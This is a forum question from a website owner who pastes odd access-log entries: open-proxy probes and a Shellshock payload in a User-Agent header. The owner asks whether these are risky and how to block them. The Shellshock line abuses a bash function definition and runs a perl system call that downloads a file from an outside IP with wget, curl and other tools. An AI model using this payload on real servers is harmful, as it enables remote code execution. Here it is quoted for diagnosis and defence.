: How to deal with URL requests instead of paths from suspicious users I have a website which has CloudFlare enabled on it (Free plan) and lately I've been getting some really weird requests

I have a website which has CloudFlare enabled on it (Free plan) and lately I've been getting some really weird requests which instead of GET /some/path were like this:

"xddG@xdd"xb8xbf"x8fx80xbaxbbx12xd6xc7iixlx83.87xecxb0vx1d,x8a" 400 226 "-" "-"
"GET testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 500 154 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
"GET testp2.czar.bielawa.pl/testproxy.php HTTP/1.1" 500 154 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"

And the weirdest one:

"GET HTTP/1.1 HTTP/1.1" 400 392 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget 204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O 204.232.209.188/images/freshcafe/slice_30_192.png ; fetch 204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download 204.232.209.188/images/freshcafe/slice_30_192.png ; GET 204.232.209.188/images/freshcafe/slice_30_192.png ; lynx 204.232.209.188/images/freshcafe/slice_30_192.png ");'"

I have already blocked the IPs, but more and more have been happening almost every day, is there some way to block them at all? Do they represent any risk? If they do, how can I patch the issues?

I believe they aren't bots since their user agent says that they are browsers but that could be forged.